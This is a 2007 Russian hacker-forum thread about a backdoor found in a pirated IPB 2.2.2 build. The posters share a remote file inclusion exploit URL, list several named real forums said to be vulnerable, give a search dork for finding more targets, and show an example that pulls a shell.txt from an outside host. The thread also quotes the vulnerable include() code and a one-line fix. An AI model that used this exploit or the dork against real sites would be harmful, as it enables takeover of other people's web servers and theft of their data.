Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Бэкдор в Ipb 2.2.2 (Русская пиратская версия) |
14.07.2007, 05:06
|
|
Познающий
Регистрация: 06.06.2007
Сообщений: 83
Провел на форуме:
404154
Репутация:
140
|
|
Бэкдор в Ipb 2.2.2 (Русская пиратская версия)
Сегодня изучал свой форум на предмет пхп иньекций и наткнулся на бэкдор.. погуглил немного и нашел в сети еше штук 30 таких форумов..
Как я понял его просто кто-то всунул туда и стал распространять...
В общем работает тока на IPB 2.2.2 Русская версия (и то не на всех)
Код:
http://site/forum/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=[URL]
Как вам, а?  |
|
|
14.07.2007, 05:13
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028
Репутация:
2371
|
|
Работает не везде...
Просто надо качать нуллы от русского офф.сайта поддержки Ipb
|
|
|
|
14.07.2007, 13:41
|
|
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме:
5885100
Репутация:
773
|
|
Не тока в левых Ipb такое есть...
|
|
|
|
15.07.2007, 01:10
|
|
Участник форума
Регистрация: 25.12.2005
Сообщений: 151
Провел на форуме:
874713
Репутация:
53
|
|
Shram-spb напиши плз форум где работает для теста.
|
|
|
|
15.07.2007, 01:33
|
|
Познающий
Регистрация: 06.06.2007
Сообщений: 83
Провел на форуме:
404154
Репутация:
140
|
|
Код:
http://vsecrazy.ru/forum/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=[url]
|
|
|
|
15.07.2007, 13:22
|
|
Участник форума
Регистрация: 25.12.2005
Сообщений: 151
Провел на форуме:
874713
Репутация:
53
|
|
Не работает сайт можно ешё 1 плз.
|
|
|
|
15.07.2007, 15:16
|
|
Познающий
Регистрация: 06.06.2007
Сообщений: 83
Провел на форуме:
404154
Репутация:
140
|
|
Сообщение от Vallez
Не работает сайт можно ешё 1 плз.
Видимо уже кто-то сломал.. или админы проснулись %)
Вот еще парочка.
Код:
http://antigothic.ru/forum/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=[URL]
Код:
http://www.forum.partisans.com.ua/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=[URL]
|
|
|
|
16.07.2007, 17:45
|
|
Banned
Регистрация: 11.10.2006
Сообщений: 682
Провел на форуме:
3750406
Репутация:
271
|
|
Поподробней распиши, обьясни поподробней, ато я чёт не пойму на каких работает и как глянуть что работает.
|
|
|
|
16.07.2007, 18:07
|
|
Участник форума
Регистрация: 25.06.2006
Сообщений: 220
Провел на форуме:
2052669
Репутация:
178
|
|
Написано же
вот и подставляй туда свой урл
Вот пример:
Код:
http://antigothic.ru/forum/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=http://forum.antichat.ru/showthread.php
|
|
|
|
16.07.2007, 18:07
|
|
Познающий
Регистрация: 06.06.2007
Сообщений: 83
Провел на форуме:
404154
Репутация:
140
|
|
Сообщение от a1ex
Поподробней распиши, обьясни поподробней, ато я чёт не пойму на каких работает и как глянуть что работает.
Код:
dork: "Русская версия IP.Board 2.2.2 © 2007 IPS, Inc."
exploit: http://site/forum/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=http://4elovek.spb.ru/shell.txt
Куда уж подробнее??
Работает на чьем-то конкретном null'e.. но на чьем я пока не выяснил..
Ясно, что версия пиратская.. если на главной странице внизу написано, что "Лицензия для...", то адназначно не прокатит..
Ищите.. я много таких нашел.. но ломать не советую.. ничего инетерсного там нет, посещаемость таких форумов как правило мала... так что лучше проверять дырку и сообщать админам... фиксится так:
/source/action_public/profile.php
строка 885:
Код:
if ( $chk )
{
@include ($chk);
exit();
}
Меняем на:
Код:
if ( $chk )
{
echo "Fuck you, Spilberg... Fixed by 5hr4M...";
exit();
}
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
